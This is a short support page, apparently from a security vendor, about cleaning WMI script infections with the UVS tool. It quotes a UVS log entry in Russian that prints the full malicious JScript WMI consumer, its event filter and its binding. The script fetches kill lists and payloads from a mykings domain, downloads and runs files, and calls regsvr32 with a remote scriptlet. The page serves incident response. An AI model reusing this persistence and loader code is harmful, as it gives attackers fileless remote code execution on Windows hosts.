

KAMIRAN Support

WMI Infections


On the forum.esetnod32.ru forum we resolve WMI script infections using the Universal Virus Sniffer (UVS) program. The quoted UVS entry below shows the typical persistence mechanism: an ActiveScriptEventConsumer in root\subscription, bound through a __FilterToConsumerBinding to an __EventFilter whose WQL query fires on a named timer event, so the embedded script keeps re-running without any file-based autorun entry.

https://forum.esetnod32.ru/forum6/topic14074/
 


 

Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\YOUMM2_CONSUMER.[YOUMM2_FILTER]
Имя файла YOUMM2_CONSUMER.[YOUMM2_FILTER]
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

Удовлетворяет критериям
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ YOUMM2_CONSUMER)(1) [delall (0)]

Сохраненная информация на момент создания образа
Статус в автозапуске

Namespace \\.\root\subscription
Consumer_Name youmm2_consumer
Consumer_Class ActiveScriptEventConsumer
Consumer_ScriptingEngine Jscript
Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name youmm2_filter
Filter_Class __EventFilter
Filter_Query select * from __timerevent where timerid="youmm2_itimer"
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="youmm2_consumer"";
Filter = "\\\\.\\root\\subscription:__EventFilter.Name="youmm2_filter"";
};

#MOF_Event#
instance of __EventFilter
{
Name = "youmm2_filter";
Query = "select * from __timerevent where timerid="youmm2_itimer"";
QueryLanguage = "wql";
};


 

 
